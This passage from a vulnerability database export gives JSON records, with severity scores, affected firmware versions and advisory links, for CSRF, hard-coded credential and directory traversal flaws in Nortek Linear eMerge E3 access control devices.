        "data": "Linear eMerge E3-Series devices allow Cross-Site Request Forgery (CSRF). (DoS) It may be in a state. Nortek Security\u0026Control Linear eMerge E3-Series is an access control device from Nortek Security\u0026Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7262",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "155263",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099",
            "trust": 0.7
          },
          {
            "db": "EXPLOIT-DB",
            "id": "47620",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158697",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "id": "VAR-201907-0163",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-03-18T22:23:59.485000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-352",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155263/nortek-linear-emerge-e3-access-control-cross-site-request-forgery.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7262"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          },
          {
            "trust": 0.6,
            "url": "https://www.exploit-db.com/exploits/47620"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "date": "2019-07-02T18:15:12.143000",
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-11-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158697"
          },
          {
            "date": "2024-03-07T08:28:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          },
          {
            "date": "2022-10-14T01:14:27.337000",
            "db": "NVD",
            "id": "CVE-2019-7262"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Cross-site request forgery vulnerability in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005915"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "cross-site request forgery",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-099"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0162

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices have Hard-coded Credentials. Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.

    Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to bypass authentication detection

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0162",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": "lte",
            "trust": 0.6,
            "vendor": "nortek",
            "version": "\u003c=1.00-06"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "1.00-06",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "LiquidWorm",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2019-7261",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "CVE-2019-7261",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2019-34630",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-158696",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2019-7261",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2019-7261",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2019-34630",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201907-102",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-158696",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear eMerge E3-Series devices have Hard-coded Credentials. Linear eMerge E3 series devices contain a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to bypass authentication detection",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2019-7261",
            "trust": 3.9
          },
          {
            "db": "PACKETSTORM",
            "id": "155267",
            "trust": 1.7
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-24-065-01",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96911165",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "id": "VAR-201907-0162",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          }
        ],
        "trust": 1.7
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          }
        ]
      },
      "last_update_date": "2024-03-18T22:23:59.454000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "eMerge\u00a0E3-Series\u00a0Access\u00a0Control",
            "trust": 0.8,
            "url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-798",
            "trust": 1.1
          },
          {
            "problemtype": "Use hard-coded credentials (CWE-798) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.applied-risk.com/resources/ar-2019-005"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2019-7261"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/155267/nortek-linear-emerge-e3-access-controller-1.00-06-ssh-ftp-remote-root.html"
          },
          {
            "trust": 1.7,
            "url": "https://applied-risk.com/labs/advisories"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/vu/jvnvu96911165/"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-065-01"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "date": "2019-07-04T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "date": "2019-07-02T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "date": "2019-07-02T18:15:12.080000",
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-10-11T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2019-34630"
          },
          {
            "date": "2019-11-12T00:00:00",
            "db": "VULHUB",
            "id": "VHN-158696"
          },
          {
            "date": "2024-03-07T08:20:00",
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          },
          {
            "date": "2022-10-14T01:20:26.870000",
            "db": "NVD",
            "id": "CVE-2019-7261"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to the use of hard-coded credentials in series devices",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005914"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201907-102"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201907-0153

    Vulnerability from variot - Updated: 2024-03-18 22:23

    Linear eMerge E3-Series devices allow Directory Traversal. Linear eMerge E3 series devices contain a path traversal vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Nortek Security&ControlLineareMergeE3-Series is an access control device from Nortek Security & Control. A path traversal vulnerability exists in the LineareMergeE3-Series device due to a program that failed to properly process sequences such as \342\200\230../\342\200\231. An attacker could exploit the vulnerability to traverse the file system and access files or directories outside of the restrictions

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201907-0153",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "linear emerge elite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge essential",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "nortekcontrol",
            "version": "1.00-06"
          },
          {
            "model": "linear emerge elite",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "linear emerge essential",
            "scope": null,
            "trust": 0.8,
            "vendor": "nortek",
            "version": null
          },
          {
            "model": "security\u0026control linear emerge e3-series",
            "scope": null,
            "trust": 0.6,
            "vendor": "nortek",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2019-21272"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2019-005907"
          },
          {
            "db": "NVD",
            "id": "CVE-2019-7253"
          }
        ]
      },
      "configurations": {
        "@context": {
